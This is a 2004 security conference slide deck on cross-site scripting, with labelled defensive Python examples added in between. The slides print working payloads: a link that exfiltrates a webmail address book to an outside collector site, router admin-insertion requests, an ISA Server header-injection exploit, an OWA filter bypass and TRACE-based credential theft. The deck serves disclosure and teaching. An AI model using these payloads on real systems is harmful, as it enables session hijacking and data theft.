
Not only a XSS

  1. FIST Conference, March 2004. Not only a XSS. Toni Cortès Martínez, Infohacking Research
  2. Guideline
     • Introduction
     • XSS Today
     • Let's see some XSS
  3. Introduction: What's this?
     • XSS?
     • How does it work?
     • Where does it work?
     • Application level security.
     • OK, but it's only a XSS.
  4. XSS (common attacks)
     • When somebody can exploit user input to get a non-expected response.
     • The error is usually due to poor filtering of user input and/or of the output of dynamically generated pages.
     • This could allow access to something restricted to the user, for example session credentials (cookies, session IDs, etc.).
  5. How it works
     • The attacker must trick the victim into making a special HTTP request.
     • Usually exploited in web environments: 1) webmails, 2) web forums, 3) any web application (dynamic content) that allows user interaction.
     • Other applications that render some output as HTML (log viewers, mail clients): "HTML injection" (like ILLC techniques).
     • Exploits a non-secure programming methodology.
     • The attacker usually wants the victim to do something: send out some cookie (session or permanent); make an HTTP request for you ;)
     • The goal of XSS: we are in the victim's environment.
  6. How it works, example
     • We find a flaw on a server (e.g. an online bank with an email service).
     • Construct a special request to exploit this flaw (XSS) and obtain user credentials.
     • Send a message to the victim (with window.open, img src, etc.).
     • Wait for the user to access it and get the session tracking cookie.
     • Access the online bank with the user's credentials (stolen cookie).
     • Now we are this user for a while.
  7. Where does it work?
     • Any dynamically generated content that depends on user input is a potential XSS security hole.
     • Enter your name: Toni -> Hi Toni
     • Simple example of exploitation on a dynamic page: Enter your name: Toni<script>alert('Hello XSS')</script> -> Hi Toni
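The "Enter your name" page from slide 7, as an added example that is not part of the talk: the vulnerable echo beside the output-encoded version, using the slide's own test input. Function names and the attribute variant are this example's own.

```python
import html

# The slide's own test input (a constructed sample, not captured traffic).
PAYLOAD = "Toni<script>alert('Hello XSS')</script>"


def greet_vulnerable(name: str) -> str:
    """The page as the slide shows it: the name is echoed unchanged, so
    any markup in it becomes part of the response and the browser runs it."""
    return "<p>Hi " + name + "</p>"


def greet_safe(name: str) -> str:
    """The fix is output encoding: the HTML metacharacters are encoded when
    the value is written into element content, so it renders as plain text."""
    return "<p>Hi " + html.escape(name, quote=True) + "</p>"


def greet_attr_safe(name: str) -> str:
    """The same value inside a quoted attribute: quotes must be encoded too,
    otherwise the input could close the attribute and start a new one."""
    return '<input name="name" value="' + html.escape(name, quote=True) + '">'


def raw_script_survives(fragment: str) -> bool:
    """Response check a tester would automate: is a live <script> tag
    still present in what the server sent back?"""
    return "<script" in fragment.lower()
```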
  8. Application level security
     • Nowadays, application level security is one of the computing challenges.
     • Application level firewalls like HIVE or layer 7 filters.
     • Client-side security is out of the webmaster's control.
     • Servers can only do their best trying to filter any data coming from the client side.
     • Fact: most XSS-based attacks and vulnerabilities are easy to exploit.
     • No special skills are needed -> script kiddies.
     • XSS is useful to impersonate a user but doesn't provide a direct or easy way of controlling a computer... umm, well, you still can do a lot of things ;-)
  9. OK, but it's only a XSS...
     • Yes, XSS attacks seem harmless by themselves, but they can open other attack vectors.
     • We can gain access to a web admin tool (IIS 6.0 Web Admin XSS vulnerability).
     • XSS breaks old HTTP session tracking methods: IDs in the URL, cookies, and also source-IP based authentication (Iplanet Messaging Server XSS vulnerability).
     • Combination of XSS with other flaws to launch a more complex attack: Hotmail XSS and AV bypass; Microsoft user domain credentials access via OWA XSS (via XST).
  10. XSS today
     • XSS, next generation attacks.
     • Proof of concept: HTTP redirection.
     • XSS based worms & trojans: XSS worm; XSS trojan.
     • Anyone could be affected by XSS.
  11. XSS next generation attacks
     • HTTP response redirection (information leak) (Zeus Web Admin XSS)
     • HTTP bouncing (full interactive) ... under construction
  12. Proof of concept: HTTP redirection
     • Example of an evil link that steals the address book of the victim's webmail:
        http://<target>/vulnerable.cgi?variable=<script>function%20pedo(){var%20xmlHttp%20=%20new%20ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("GET","http://<target>/address_book.cgi",false);xmlHttp.send();xmlDoc=xmlHttp.responseText;window.open("http://www.infohacking.com/data_collector.php?response="+xmlDoc);}pedo();</script>
  13. HTTP redirection, which means:
     • http://<target>/vulnerable.cgi?variable= (server path to the script injection), followed by the decoded script:
        <script>
        function pedo() {
          var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
          xmlHttp.open("GET", "http://<target>/address_book.cgi", false); // MAKE REQUEST
          xmlHttp.send();
          xmlDoc = xmlHttp.responseText;                                   // STORE RESPONSE
          window.open("http://<attacker_site>/" + xmlDoc);                 // SEND RESPONSE TO ATTACKER
        }
        pedo();
        </script>
     • Note: we use "window.open" to send the response in order to bypass the "xmlHttp.open" security restrictions.
  14. XSS based worms & trojans: general "features"
     • Spreading through webmail servers
     • Self-decrypting script routine
     • Can modify permanent cookies (trojan)
     • Can force session logout (DoS)
     • Can impersonate the user
     • Can steal information (mail content, address book, etc.)
     • Hard to detect by AV software (encrypted payload)
     • If no user action is needed (as with an XSS in some field of the mail), then the spreading will be very fast!
  15. XSS worm, how it works:
     • Once executed, the script will self-decrypt and try to detect the source (Hotmail, Yahoo, Terra, ...) or the webmail software (Iplanet, etc.). It can be done with a simple "document.URL", comparing it against some patterns.
     • If the source is known, try to get the address book.
     • Filter only webmail addresses.
     • Auto-send routine.
  16. XSS trojan, how it works:
     • Once executed, the script will self-decrypt and try to set a permanent cookie (which will be stored on the victim's hard disk).
     • The modified cookie could change some option: it can set Chinese as the default language ;-) (DoS).
     • The modified cookie could redirect the victim to some place on the server that is controlled by the attacker (by changing some profile setting in the cookie).
     • As with worms, a trojan could try to spread...
  17. Anyone can be affected by XSS. Recent example: ViewCVS.py. Affected sites: Sourceforge.net, Apache.org, Iptables.org. Those sites are well known to everybody, and they are probably managed by security-conscious people... anyway, they can still be exposed to XSS risks...
  18. Sourceforge.net (screenshot)
  19. Apache.org (screenshot)
  20. Iptables.org (screenshot)
  21. Some XSS examples from Infohacking Research
     • 3Com 812 ADSL router -> we add a new admin
     • Inktomi Traffic Server -> all users vulnerable to this XSS
     • Iplanet Messaging Server -> session hijack
     • Microsoft ISA Server
     • OWA XSS -> access to user credentials
  22. XSS on the 3Com ADSL router. There are a lot of XSS present on the OCR812:
        http://<ip_of_OCR812>/<script>document.write("<b>WE_CAN_INJECT_CODE</b>")</script>
  23. XSS on the 3Com ADSL router. With XSS we can insert new users into our router.
     • We can use window.open or <img src=...> to make our special request:
        /Forms/admin_telnet_add"+String.fromCharCode(63)+"uumUserName=infohacking&uumUserPassword=
  24. XSS on the 3Com ADSL router. We can do the complete process if we know the IP, user and password (for example, the old admin):
        <html>
        <img src="<ip_or_name_of_OCR812>/legalizacion_marihuana.jpg">
        <script type="text/javascript">
        var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
        xmlHttp.open("GET", "<YOUR_FUCKING_REQUEST>", false);
        xmlHttp.setRequestHeader("Authorization", "Basic <user:password, base64 encoded>");
        xmlHttp.send();
        </script>
        </html>
  25. Inktomi Traffic Server XSS
     • Inktomi Traffic Server is a proxy cache used in several countries by ISPs.
     • Also known in Spain as "Proxy cache de Telefónica".
     • A special request by a client passing through the Inktomi Traffic Server causes an error page generated by the proxy. This dynamic error page is vulnerable to cross-site scripting...
     • Indirectly, any server whose clients come through the Traffic Server and that uses cookies to track sessions is "vulnerable".
     • The client making the request IS UNABLE to distinguish what domain generated this code...
  26. Inktomi Traffic Server XSS. Exploit?
     • We tested it on version 5.5.1.
     • Only need to configure a proxy on ANY IP with port 80.
     • Make a special request:
        http://<spoofed_domain>:443/</em><script>alert()</script>
     • We can see the script executed in our browser, "generated" by the spoofed domain. Now we can access cookies and everything, like a man-in-the-middle attack.
  27. Iplanet messaging server XSS
     • This webmail, Iplanet Messaging Server, allows us to hijack the SID.
     • This server allows "online" opening of file attachments. This means that any HTML file will be opened by the client browser in the Iplanet webmail domain context. Wonderful XSS ;-)
     • Now we can exploit this XSS with an HTML attachment. With document.URL we obtain the SID and userid (located in the URL). With the SID, we gain access to all attachments:
        http://<iplanet_host>/attach/file.html?sid=XYXYXYXYXYXYXY&mbox=INBOX&uid=XXXXX&number=2&filename=file.html
  28. Iplanet messaging server XSS. But this is not easy... Iplanet webmail includes IP session tracking. When can we use the hijacked SID?
     • If we are near the victim, behind a NAT device, we can access with his SID.
     • We can steal the session of everybody who accesses through a transparent proxy (like transparent proxy devices).
     • Or we can create a script to force the user to make the request and redirect to us. Of course... they don't see anything... (see above)
     • Note: a lot of web servers use the same session cookie on both the HTTP and HTTPS domains. (This note is for the online bank developers.)
  29. Microsoft ISA Server XSS. This example shows an XSS exploited using headers.
     • When we try to go to an unreachable URL through ISA Server, ISA generates an error page showing some data (the content of the "Via" header).
     • We set this header ourselves.
     • Now we can request a non-existent URL in an existing domain (usually a server uses the same cookie for its whole domain).
     • Steal cookies -> access.
     • We don't need a flaw in the server code. Use ISA Server instead.
  30. ISA Server exploit
        <html><body>
        <script type="text/javascript">
        alert("Click OK then wait for a few seconds...");
        var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
        xmlHttp.open("GET", "http://www.infohacking.com:113", false);
        xmlHttp.setRequestHeader("Via", "CODE_INJECTED_IN_VIA_HEADER<script>alert('ISA_SERVER_XSS_by_INFOHACKING')<\/script>");
        xmlHttp.send();
        xmlDoc = xmlHttp.responseText;
        document.write(xmlHttp.responseText);
        </script>
        </body></html>
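Slides 25 to 30 share one defect: a proxy writes a request value (the requested host/URL for Inktomi, the Via header for ISA Server) into its own error page without encoding it. The detector below is an added example, not part of the talk or of either product; it scans constructed log lines in a hypothetical `<client> <method> <url> via="..."` format and flags the values a proxy would have reflected with markup inside, undoing URL encoding first so the slide's %-encoded style of link is caught too.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in a hypothetical format (not real ISA or
# Inktomi log output):  <client> <method> <url> via="<Via header>"
SAMPLE_LOG = """\
10.0.0.5 GET http://intranet.example/page.cgi?name=Toni via="1.1 proxy.example"
10.0.0.7 GET http://shop.example:443/%3C/em%3E%3Cscript%3Ealert()%3C/script%3E via="1.1 proxy.example"
10.0.0.9 GET http://www.example.net:113/ via="1.1 x<script>alert(1)</script>"
10.0.0.5 GET http://intranet.example/search?q=1%3C2 via="1.1 proxy.example"
"""

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) via="([^"]*)"$')
# Coarse heuristic: a tag open/close, a javascript: URL or an on*= handler.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z]|javascript:|\bon[a-z]+\s*=", re.I)


def reflected_markup(value: str) -> bool:
    """True when the value, after URL-decoding (repeated, to undo double
    encoding), carries something a browser would treat as markup."""
    decoded = value
    for _ in range(3):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return bool(MARKUP_RE.search(decoded))


def scan_log(text: str) -> list:
    """Returns (client, field, value) for every URL or Via value that the
    proxy would have echoed into its error page with markup inside."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, _method, url, via = m.groups()
        for field, value in (("url", url), ("via", via)):
            if reflected_markup(value):
                hits.append((client, field, value))
    return hits
```

The fourth sample line (a query containing `1<2`) is deliberately not flagged, so the heuristic does not fire on every encoded angle bracket.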
  31. OWA XSS. What do we have here?
     • With OWA you can see an HTML-formatted e-mail.
     • A user must click on a special link for this purpose in the webmail interface, and an alert will pop up.
     • To avoid people executing malicious content in the client browser, OWA will try to filter the content of the mail. Good, but... not enough.
  32. Disabling OWA filtering. The URL to view an HTML-formatted mail is something like this:
        http://<IP_or_name_of_the_server>/exchange/<username>/<inbox_name>/<subject>.EML/1_multipart/2_text.htm?Security=1
     • Good name for a parameter; another name might be "change_this_for_fucking_us". We only need to remove this parameter, and OWA doesn't apply the filter.
  33. OWA XSS. Obtaining data to create our special link.
     • We need the IP or hostname of the server, the user name and the subject.
     • All this we can find in the "Referer" header of an HTTP request coming from a link in the body of the message: <img src="http://<site_of_the_attacker>">
     • Now, with the referrer, we can send our attack.
     • We have the IP or hostname of the server (from the referrer).
     • We have the user name (from the referrer).
     • We know the subject.
     • We create a link in the body of the message, without the "Security" parameter (a link to the same message without the Security parameter).
  34. OWA, stolen credentials. Nothing else?
     • OWA uses cookies to track the HTTP session, but also uses "Basic Auth" for... more security? ;-)
     • This "Basic Auth" (-> base64 encoded user:passwd) contains the user credentials for this domain.
     • To access the "Basic Auth" header, the easiest way is via an HTTP "TRACE" request... and IIS (Internet Information Server) by default allows those kinds of requests.
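The TRACE behaviour behind slide 34, as an added lab example that is not part of the talk and touches no real OWA or IIS: an in-process server that serves TRACE by reflecting the request (so the Authorization header lands in a response body that script can read) beside one that refuses the method, and a check that reports which of the two you are running. The handler classes, the `demo:demo` credential and the `/exchange/` path are this example's own.

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


class EchoingTrace(BaseHTTPRequestHandler):
    """Permissive behaviour: TRACE reflects the whole request, request
    headers included, back to the caller as the response body."""

    def do_TRACE(self):
        body = (self.requestline + "\r\n" + str(self.headers)).encode()
        self.send_response(200)
        self.send_header("Content-Type", "message/http")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the server quiet during the check
        pass


class RefusingTrace(EchoingTrace):
    """Hardened behaviour: the method is not served at all (405), so there is
    no body in which a reflected Authorization header could appear."""

    def do_TRACE(self):
        self.send_response(405)
        self.send_header("Allow", "GET, POST")
        self.send_header("Content-Length", "0")
        self.end_headers()


def trace_leaks_authorization(handler) -> bool:
    """Starts an in-process server with the given handler, sends one TRACE
    carrying a constructed Basic Auth header (demo:demo, not a real account)
    and reports whether that header value came back in the body."""
    srv = HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    try:
        conn = http.client.HTTPConnection("127.0.0.1", srv.server_port, timeout=5)
        conn.request("TRACE", "/exchange/", headers={"Authorization": "Basic ZGVtbzpkZW1v"})
        resp = conn.getresponse()
        leaked = resp.status == 200 and b"ZGVtbzpkZW1v" in resp.read()
        conn.close()
        return leaked
    finally:
        srv.shutdown()
        srv.server_close()
```

On a production server the equivalent of `RefusingTrace` is disabling the verb in the server itself (for IIS of that era, a URLScan verb rule that denies TRACE; on Apache, `TraceEnable off`), which is what removes the XST path the slide describes.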
  35. XSS. That's all folks?? Of course, as always, the imagination of the attacker is the only limit... much more fun is possible. Thanks for your attention.
  36. FIST Conference, March 2004. Not only a XSS © Toni Cortes Martinez & Hugo Vazquez Carames, Infohacking Research. Barcelona, 7 May 2004
